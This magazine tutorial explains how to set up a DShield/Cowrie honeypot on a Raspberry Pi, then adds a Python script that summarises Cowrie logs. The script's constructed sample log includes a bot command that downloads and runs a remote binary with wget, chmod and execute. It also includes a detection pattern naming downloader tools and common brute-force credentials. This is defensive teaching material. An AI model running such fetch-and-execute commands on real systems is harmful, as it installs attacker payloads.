APC Australia

DSHIELD PI HONEYPOT

Use a Raspberry Pi to trick hackers into thinking they’ve found a juicy target, then study them like ants in a jar.


Baiting attackers towards your own hardware might not seem a particularly good idea, but if that hardware has nothing of value on it, and is suitably isolated from your other machines, then you can more or less lure them in with impunity. The goal of setting up a honeypot is not to revenge-hack attackers, but rather to detect attacks and to distract those responsible from more valuable targets.

Opening your home network up to the internet isn't something that should be done lightly, though. If the honeypot machine were to be compromised, then it could be used as a staging post for attacking any services running on your network, including your home router. If you were foolish enough to run a honeypot on your desktop PC, then it's possible that an attacker would gain not only root access to it, but to all your files, passwords, browser history, and anything else you use it for.

DShield is an easy-to-use honeypot that can be installed anywhere. The Raspberry Pi is ideal for this because it's cheap and the SD card can easily be wiped if something goes wrong. DShield is a distributed intrusion-detection system created by the Internet Storm Center (ISC). In its own words, "DShield collects data about malicious activity from across the internet. This data is catalogued and summarised and can be used to discover trends in activity, confirm widespread attacks, or assist in preparing better firewall rules." So setting up a Pi-based DShield sensor, as they're termed, will help the security of the internet in some small way. The DShield sensor bundles Cowrie, which emulates SSH and Telnet, alongside a dummy web server; together they tempt attackers and record what they try to do.

Get started with DShield

Before you can use it you'll need to join the project by setting up an account at https://dshield.org. DShield can be installed on any Linux distribution via Git, and some tweaks are necessary to install it on the Pi. Check the project's GitHub at https://github.com/DShield-ISC/dshield if our instructions here fail you. Before we get to DShield, though, we need to ensure that our Pi is correctly set up. We'd recommend starting with a fresh installation of Raspberry Pi OS Lite. If you don't have a monitor and keyboard for your Pi to hand, then you can activate the SSH server and interact with it that way by placing an empty file called ssh on the SD card's boot partition (the mount point below is an example; adjust it to wherever your system mounts the card):
$ touch /media/user/boot/ssh

After that, you can use Nmap to help you find the Pi's IP address on your local network with something like:
$ sudo nmap -p22 --open 192.168.0.*

which will search the network for devices listening on the default SSH port. Your Pi should be easy to spot because its MAC address will identify it as a Raspberry Pi Foundation device. Log in (either by SSH or physically) using the default pi:raspberry credentials. Note that recent Raspberry Pi OS images no longer ship with the default pi user; if yours doesn't, use the account you created when writing the image.

Ensure the date is set correctly by running:
$ date

If it isn't, then you'll end up generating invalid TLS certificates, and various other things will fail mysteriously. It's also worth running raspi-config for the purposes of changing the default password, making SSH permanently active, ensuring the correct timezone is set, and expanding the filesystem to use the entire SD card. Before you reboot, it's worth upgrading everything (which will take some time, so a cup of coffee is recommended), and installing Git:
$ sudo apt update
$ sudo apt upgrade
$ sudo apt install git
$ sudo reboot


Reconnect to your Pi and clone the DShield repository:
$ git clone https://github.com/DShield-ISC/dshield.git

Then run the installation script:
$ cd dshield/bin
$ sudo ./install.sh

The script will install lots of packages (you probably have time for another cup of coffee during this phase) and then give you one last chance to bail out. Do heed this warning: if you proceed it will ask you for your email address and API key, which belong to the account you set up earlier. The key is in the My Account section on the website. Next, you'll be asked for a network interface (wired is recommended) and which networks and IPs to trust. It suggests these based on the machines currently connected to the Pi; get this right, because traffic from trusted addresses is treated as yours rather than as an attack. As part of the bait, a bogus SSH instance will take over the default port, so after this step you'll need to SSH to port 12222 to administer DShield. Finally, some Python packages will be installed via Pip, and a certificate will be generated (it's okay to accept all the defaults here). And by now you've definitely earned that third cup of coffee.

Reboot the Pi again, SSH to the new admin port, and check all is well with DShield:
$ ssh -p 12222 pi@192.168.x.x
$ cd dshield/bin
$ sudo ./status.sh

You should see an error saying that the webserver is not exposed. To attract bots and humans from outside your network, you need to tell your home router to forward incoming connection attempts to the Pi. You may already have some forwarded ports set up, either manually or via UPnP. Each router is different, but most have a DMZ (demilitarised zone) option, which will forward all traffic that wouldn't be forwarded elsewhere. You could also forward only selected ports, but the goal of DShield is to capture as much traffic as possible, so this isn't really recommended. Bear in mind that a DMZ exposes every port on the Pi, which is exactly why it must hold nothing of value and be isolated from the rest of your network.

To see connection attempts in real time, run:
$ tail -f /var/log/dshield.log

Follow the action

Besides logging usernames and passwords for any attempts to log in, Cowrie, the SSH and Telnet honeypot that DShield bundles, will also present a fake command shell to several common username and password pairs and capture the whole session. Any URLs requested from the webserver are also collected. Follow Cowrie activity with:
$ tail -f /srv/cowrie/var/log/cowrie/cowrie.log

If you want to play around in Cowrie's faux shell, just SSH to your router's external IP address using the credentials root:password (as configured by the install script, connections from the networks you marked as trusted are not redirected to Cowrie, so the internal address won't work). Lots of standard shell commands will appear to work correctly, but if you try something like rm -rf on the root directory you'll quickly see that it's all trickery. Everything you type is logged, and you can grep it out of the logs (after first logging out of Cowrie's deceptive shell) with:
$ grep CMD /srv/cowrie/var/log/cowrie/cowrie.log

It's important not to take these attacks personally; remember that most of them will be automated scans and bots. DShield is configured to send logs every half hour via a cron job. After that time your data will be visible from the My Account menu at the DShield portal.
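Grepping for CMD shows the raw lines, but after a day or two you'll want a tally: which credentials the bots try most, which sessions actually got a shell, and which of the captured commands fetch a payload. The script below, an added example that is not part of the original article nor of the DShield or Cowrie projects, parses Cowrie's plain-text log into exactly that summary. The embedded sample lines are constructed to resemble the cowrie.log format (older Cowrie releases log credentials as [root/123456], newer ones as [b'root'/b'123456'], and the regular expressions accept both); compare a line from your own log against them before trusting the counts, since the layout varies between versions. The default log path is the one used above; the summarise() and parse_cowrie_log() names are this example's own.

```python
import json
import re
import sys
from collections import Counter

# Constructed sample, modelled on Cowrie's text log (cowrie.log). These are
# not real captures; the IPs are documentation ranges.
SAMPLE_LOG = """\
2024-03-02T09:14:01.101010Z [cowrie.ssh.factory.CowrieSSHFactory] New connection: 203.0.113.17:51234 (192.168.0.20:2222) [session: 1a2b3c4d5e6f]
2024-03-02T09:14:02.202020Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,1,203.0.113.17] login attempt [b'root'/b'123456'] failed
2024-03-02T09:14:03.303030Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,1,203.0.113.17] login attempt [b'root'/b'admin'] failed
2024-03-02T09:14:04.404040Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,1,203.0.113.17] login attempt [b'root'/b'password'] succeeded
2024-03-02T09:14:05.505050Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,1,203.0.113.17] CMD: uname -a
2024-03-02T09:14:06.606060Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,1,203.0.113.17] CMD: cat /proc/cpuinfo | grep name | wc -l
2024-03-02T09:14:07.707070Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,1,203.0.113.17] CMD: wget http://198.51.100.9/x86 -O /tmp/x; chmod +x /tmp/x; /tmp/x
2024-03-02T09:20:11.111111Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,2,198.51.100.44] login attempt [b'admin'/b'admin'] failed
2024-03-02T09:20:12.121212Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,2,198.51.100.44] login attempt [b'pi'/b'raspberry'] failed
2024-03-02T09:20:13.131313Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,2,198.51.100.44] login attempt [b'root'/b'123456'] failed
"""

# The optional b'...' wrapper accepts both the old [user/pass] and the newer
# [b'user'/b'pass'] spelling. The source IP is the last field of the transport.
LOGIN_RE = re.compile(
    r"HoneyPotSSHTransport,\d+,(?P<ip>[\d.]+)\] login attempt "
    r"\[(?:b')?(?P<user>[^'/\]]*)'?/(?:b')?(?P<pw>[^'\]]*)'?\] (?P<result>failed|succeeded)"
)
CMD_RE = re.compile(r"HoneyPotSSHTransport,\d+,(?P<ip>[\d.]+)\] CMD: (?P<cmd>.*)$")

# Commands that pull a file from elsewhere are the usual first step of a bot
# that has got a shell: download a binary, make it executable, run it.
DOWNLOADER_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b")


def parse_cowrie_log(text):
    """Return (login_attempts, commands) as lists of dicts from cowrie.log text."""
    logins, cmds = [], []
    for line in text.splitlines():
        m = LOGIN_RE.search(line)
        if m:
            logins.append(m.groupdict())
            continue
        m = CMD_RE.search(line)
        if m:
            cmds.append(m.groupdict())
    return logins, cmds


def summarise(text, top=5):
    """Tally credentials, sources, successful logins and captured commands."""
    logins, cmds = parse_cowrie_log(text)
    creds = Counter((l["user"], l["pw"]) for l in logins)
    sources = Counter(l["ip"] for l in logins)
    successes = [(l["ip"], l["user"], l["pw"]) for l in logins if l["result"] == "succeeded"]
    downloaders = [c["cmd"] for c in cmds if DOWNLOADER_RE.search(c["cmd"])]
    return {
        "attempts": len(logins),
        "top_credentials": creds.most_common(top),
        "sources": sources.most_common(top),
        "successful_logins": successes,
        "commands": [c["cmd"] for c in cmds],
        "downloaders": downloaders,
    }


def report(path="/srv/cowrie/var/log/cowrie/cowrie.log"):
    """Summarise a real log file; the default path is DShield's Cowrie log."""
    with open(path, encoding="utf-8", errors="replace") as f:
        return summarise(f.read())


if __name__ == "__main__":
    # Pass a log path to analyse it; with no argument the constructed sample runs.
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_LOG
    print(json.dumps(summarise(text), indent=2))
```

Run it as `sudo python3 cowrie_summary.py /srv/cowrie/var/log/cowrie/cowrie.log` on the Pi (the log is root-owned). The downloaders list is the part worth reading closely: those URLs are what the bot would have installed on a real machine, and they are also the data DShield is gathering for the wider project.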

Cowrie is designed to mimic services, but also to be very simple behind the scenes. This reduces the possibility of it actually falling to a vulnerability at some stage. After a few hours' use, our logs started to show a few Python tracebacks resulting from Cowrie crashing out. This is in general nothing to worry about. In theory that's not meant to happen, and those tracebacks are sent to the project to stop them happening in future.

Please do heed this warning and understand the horrors that your Pi may be exposed to in the DMZ.

After a few days spent using DShield, you'll see how unimaginative the bots are with their feeble password attempts.
